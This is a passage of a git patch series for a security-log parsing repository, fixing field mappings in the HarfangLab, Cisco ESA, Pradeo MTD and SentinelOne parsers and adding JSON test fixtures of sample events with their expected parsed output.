b/Suricata/suricata/_meta/smart-descriptions.json index b330a23c1..432cf533d 100644 --- a/Suricata/suricata/_meta/smart-descriptions.json +++ b/Suricata/suricata/_meta/smart-descriptions.json @@ -151,8 +151,7 @@ "value": "query" }, { - "field": "action.type", - "value": "dns" + "field": "dns.question.name" } ], "relationships": [ From e6a207c4cb874eac232f7f121382031860ed1ed1 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 14:16:24 +0100 Subject: [PATCH 130/150] Fis on agent.id field for harfanglab --- HarfangLab/harfanglab/ingest/parser.yml | 4 ++++ HarfangLab/harfanglab/tests/threat_critical.json | 1 + HarfangLab/harfanglab/tests/threat_log.json | 1 + 3 files changed, 6 insertions(+) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 5050c7429..96338037d 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -142,6 +142,10 @@ stages: organization.id: "{{json_event.message.tenant}}" url.original: "{{json_event.message.details_url_request.url}}" + - set: + agent.id: "{{json_event.message.agents[0].agent_id}}" + filter: "{{json_event.message.agents | length > 0}}" + network_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json index 94e83a1fd..e9b50e3db 100644 --- a/HarfangLab/harfanglab/tests/threat_critical.json +++ b/HarfangLab/harfanglab/tests/threat_critical.json @@ -10,6 +10,7 @@ "start": "2024-03-19T09:21:00Z" }, "agent": { + "id": "af5e2f63-becd-4660-ade8-30d04c0dd044", "name": "harfanglab" }, "harfanglab": { diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json index dcab41c28..233ffd066 100644 --- a/HarfangLab/harfanglab/tests/threat_log.json +++ b/HarfangLab/harfanglab/tests/threat_log.json @@ -10,6 +10,7 @@ "start": "2024-02-07T15:18:00Z" }, "agent": { + "id": "215fe295-905f-4a8d-8347-e9d438d4e415", "name": "harfanglab" }, "harfanglab": { From 2f1337b090bf6735c1a77376b6fbaa2cb9a4ccf2 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 14:50:41 +0100 Subject: [PATCH 131/150] Fix on cisco.url fields --- Cisco/cisco-esa/_meta/fields.yml | 9 +++++++-- Cisco/cisco-esa/ingest/parser.yml | 11 ++++++++--- .../tests/test_attachments_details.json | 14 ++++++++++---- Cisco/cisco-esa/tests/test_ingest_log2.json | 14 ++++++++++---- Cisco/cisco-esa/tests/test_ingest_log5.json | 19 ++++++++++++++----- Cisco/cisco-esa/tests/test_ingest_log7.json | 5 ++++- 6 files changed, 53 insertions(+), 19 deletions(-) diff --git a/Cisco/cisco-esa/_meta/fields.yml b/Cisco/cisco-esa/_meta/fields.yml index 144a3c222..8adc31e3c 100644 --- a/Cisco/cisco-esa/_meta/fields.yml +++ b/Cisco/cisco-esa/_meta/fields.yml @@ -116,9 +116,14 @@ cisco.esa.status: name: cisco.esa.status type: keyword -cisco.esa.url: +cisco.esa.url.domain: + description: the declaration of the cisco urls domains + name: cisco.esa.url.domain + type: keyword + +cisco.esa.url.full: description: the declaration of the cisco urls - name: cisco.esa.url + name: cisco.esa.url.full type: keyword email.attachments: diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 67b76402f..65e217b47 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -209,9 +209,14 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url: >- - [{% for url, details in dict(json_event_url_details.message).items() %} - "{% if details.get('ExpandedUrl') is not none %}{{ details.ExpandedUrl }}{% else %}{{ url }}{% endif %}" + cisco.esa.url.domain: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url.split('/')[2]}}", "{{ details.ExpandedUrl.split('/')[2] }}"{% else %}"{{ url.split('/')[2] }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + cisco.esa.url.full: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} {% if not loop.last %},{% endif %} {% endfor %}] url.domain: "{{parsed_event.message.EAURLDetails}}" diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 56ac98c83..d6a1e2d56 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -55,10 +55,16 @@ "age": "30 days (or greater)" } }, - "url": [ - "http://schemas.microsoft.com/office/2004/12/omml", - "http://www.w3.org/TR/REC-html40" - ] + "url": { + "domain": [ + "schemas.microsoft.com", + "www.w3.org" + ], + "full": [ + "http://schemas.microsoft.com/office/2004/12/omml", + "http://www.w3.org/TR/REC-html40" + ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index afb99f16d..861934a97 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -58,10 +58,16 @@ "age": "9 years 3 months 14 days" } }, - "url": [ - "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", - "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" - ] + "url": { + "domain": [ + "bce-demo.appc.cisco.com", + "mandrill.appc.cisco.com" + ], + "full": [ + "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", + "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 553425b45..77ae37f04 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -52,11 +52,20 @@ "age": "30 days (or greater)" } }, - "url": [ - "https://facebook.com/u/john.doe", - "https://tiktok.com", - "www.twitter.com" - ] + "url": { + "domain": [ + "", + "facebook.com", + "tiktok.com", + "tinyurl.es" + ], + "full": [ + "https://facebook.com/u/john.doe", + "https://tiktok.com", + "https://tinyurl.es/tbdra", + "www.twitter.com" + ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 29716af19..8fcb871ab 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -55,7 +55,10 @@ "age": "30 days (or greater)" } }, - "url": [] + "url": { + "domain": [], + "full": [] + } } }, "email": { From e927ad7740757db69157c57ffde80af5277eb184 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 15:07:44 +0100 Subject: [PATCH 132/150] Pradeoo: fix on Pradeo MTD parser for application compliance --- Pradeo/pradeo-mtd/ingest/parser.yml | 20 +++---- .../tests/application_compliance_updated.json | 55 +++++++++++++++++++ 2 files changed, 65 insertions(+), 10 deletions(-) create mode 100644 Pradeo/pradeo-mtd/tests/application_compliance_updated.json diff --git a/Pradeo/pradeo-mtd/ingest/parser.yml b/Pradeo/pradeo-mtd/ingest/parser.yml index 239ce01d4..c10d3c444 100644 --- a/Pradeo/pradeo-mtd/ingest/parser.yml +++ b/Pradeo/pradeo-mtd/ingest/parser.yml @@ -176,16 +176,16 @@ stages: pradeo.device.mdmId: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.externalId}}" pradeo.device.emm: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.emm}}" pradeo.compliance.matchedResponseRules: "{{json_event.message.content.deviceApplication.compliance.matchedResponseRules}}" - pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.application.id}}" - pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.application.package.package}}" - pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.application.package.system}}" - pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.application.version}}" - pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.application.versionCode}}" - pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.application.name}}" - pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.application.md5}}" - pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.application.sha1}}" - pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.application.sha256}}" - pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}" + pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.id}}" + pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.package}}" + pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.system}}" + pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.version}}" + pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.versionCode}}" + pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.name}}" + pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.md5}}" + pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha1}}" + pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha256}}" + pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.status}}" - filter: '{{json_event.message.type == "DeviceComplianceUpdated"}}' set: event.category: ["process"] diff --git a/Pradeo/pradeo-mtd/tests/application_compliance_updated.json b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json new file mode 100644 index 000000000..916f71473 --- /dev/null +++ b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json @@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "sekoiaio": { + "intake": { + "dialect": "Pradeo MTD", + "dialect_uuid": "3cedbe29-02f8-42bf-9ec2-0158186c2827" + } + } + }, + "expected": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "event": { + "action": "DeviceApplicationComplianceUpdated", + "category": [ + "process" + ], + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-27T04:10:33.460000Z", + "pradeo": { + "application": { + "id": "azertyuiop", + "md5": "0fccfdefc882c4be6d2a938001184e08", + "name": "App", + "package": "com.app.test", + "sha1": "749c94cd972726ef2b3ccda7e718a2034cc9f6ac", + "sha256": "278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8", + "system": "Android", + "version": "491.0.0.58.78", + "versionCode": "457215664" + }, + "device": { + "byod": false, + "coupled": true, + "declaredModel": "MODEL 01", + "declaredOperatingSystem": "Android", + "declaredOperatingSystemSecurityPatchDate": "2020-09-01T00:00:00Z", + "declaredOperatingSystemVersion": "10.0.0", + "id": "device_id01", + "lastConnection": "2024-11-27T04:07:32Z", + "name": "John", + "serialNumber": "unknown" + }, + "metadata": { + "creationDate": "2024-11-27T04:10:33.460000Z", + "id": "1234567890", + "source": "system", + "type": "DeviceApplicationComplianceUpdated" + } + } + } +} \ No newline at end of file From 2e73fb7509b85c32c709f65d816757bc0d89159d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 10 Dec 2024 15:23:16 +0100 Subject: [PATCH 133/150] Update Cisco/cisco-esa/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Cisco/cisco-esa/ingest/parser.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 65e217b47..ea082905c 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -209,12 +209,12 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url.domain: >- + cisco.esa.url_domain: >- [{% for url, details in json_event_url_details.message.items() %} {% if details.get('ExpandedUrl') is not none %}"{{url.split('/')[2]}}", "{{ details.ExpandedUrl.split('/')[2] }}"{% else %}"{{ url.split('/')[2] }}"{% endif %} {% if not loop.last %},{% endif %} {% endfor %}] - cisco.esa.url.full: >- + cisco.esa.url: >- [{% for url, details in json_event_url_details.message.items() %} {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} {% if not loop.last %},{% endif %} From 6335db5a7e01d89222de436ad488b49a3bc3ae93 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 16:26:06 +0200 Subject: [PATCH 134/150] Fix: SentinelOne smart descriptions --- .../_meta/smart-descriptions.json | 52 ++++++++++ .../tests/process_processcreation_2.json | 96 +++++++++++++++++++ 2 files changed, 148 insertions(+) create mode 100644 SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json diff --git a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json index 9a4b1bf43..9acf6e91d 100644 --- a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json +++ b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json @@ -682,6 +682,58 @@ } ] }, + { + "value": "Process {process.command_line} was created by {process.user.name}", + "conditions": [ + { + "field": "event.action", + "value": "Process Creation" + }, + { + "field": "process.user.name" + }, + { + "field": "process.command_line" + } + ], + "relationships": [ + { + "source": "process.user.name", + "target": "process.parent.command_line", + "type": "created" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.title", + "type": "has process title" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "has name" + }, + { + "source": "process.command_line", + "target": "process.title", + "type": "has title" + }, + { + "source": "process.command_line", + "target": "process.name", + "type": "has name" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "created" + }, + { + "source": "process.user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "Process {process.command_line} was created by {user.name}", "conditions": [ diff --git a/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json new file mode 100644 index 000000000..62320459c --- /dev/null +++ b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json @@ -0,0 +1,96 @@ +{ + "input": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}" + }, + "expected": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}", + "event": { + "action": "Process Creation", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-12-05T08:18:51.479000Z", + "agent": { + "version": "23.3.1.7037" + }, + "deepvisibility": { + "agent": { + "managment_url": "mgm-testing-test.sentinelone.net", + "trace_id": "XXXXXXX-XXXXXXXX-XXXXXXX", + "uuid": "xxxx-XXXXXX-XXXXx-xxxxx" + }, + "event": { + "category": "process", + "type": "Process Creation" + }, + "host": { + "os": { + "revision": "14.7.1 (23H222)" + } + }, + "process": { + "target": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "storyline_id": "EE9FB66D-9B03-4286-971C-7A20615D157B", + "title": "curl", + "working_directory": "/usr/bin" + } + } + }, + "host": { + "name": "LMFR0205", + "os": { + "family": "osx", + "name": "OS X" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "pid": 30273, + "start": "2024-12-05T08:18:51.479000Z", + "title": "curl", + "user": { + "name": "test.user" + }, + "working_directory": "/usr/bin" + }, + "related": { + "hash": [ + "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42", + "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "fe61928bbd84ed16fc4f934307bf2f16" + ] + }, + "url": { + "domain": "test.test", + "original": "https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "path": "/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "port": 443, + "scheme": "https", + "subdomain": "test" + } + } +} \ No newline at end of file From 1757251807a7b82dbfcc0a5a1564263567755787 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 15:27:28 +0100 Subject: [PATCH 135/150] fix on fields --- Cisco/cisco-esa/_meta/fields.yml | 12 ++++----- .../tests/test_attachments_details.json | 18 ++++++------- Cisco/cisco-esa/tests/test_ingest_log2.json | 18 ++++++------- Cisco/cisco-esa/tests/test_ingest_log5.json | 26 +++++++++---------- Cisco/cisco-esa/tests/test_ingest_log7.json | 6 ++--- 5 files changed, 36 insertions(+), 44 deletions(-) diff --git a/Cisco/cisco-esa/_meta/fields.yml b/Cisco/cisco-esa/_meta/fields.yml index 8adc31e3c..3ea23bd6f 100644 --- a/Cisco/cisco-esa/_meta/fields.yml +++ b/Cisco/cisco-esa/_meta/fields.yml @@ -116,14 +116,14 @@ cisco.esa.status: name: cisco.esa.status type: keyword -cisco.esa.url.domain: - description: the declaration of the cisco urls domains - name: cisco.esa.url.domain +cisco.esa.url: + description: the declaration of the cisco urls + name: cisco.esa.url type: keyword -cisco.esa.url.full: - description: the declaration of the cisco urls - name: cisco.esa.url.full 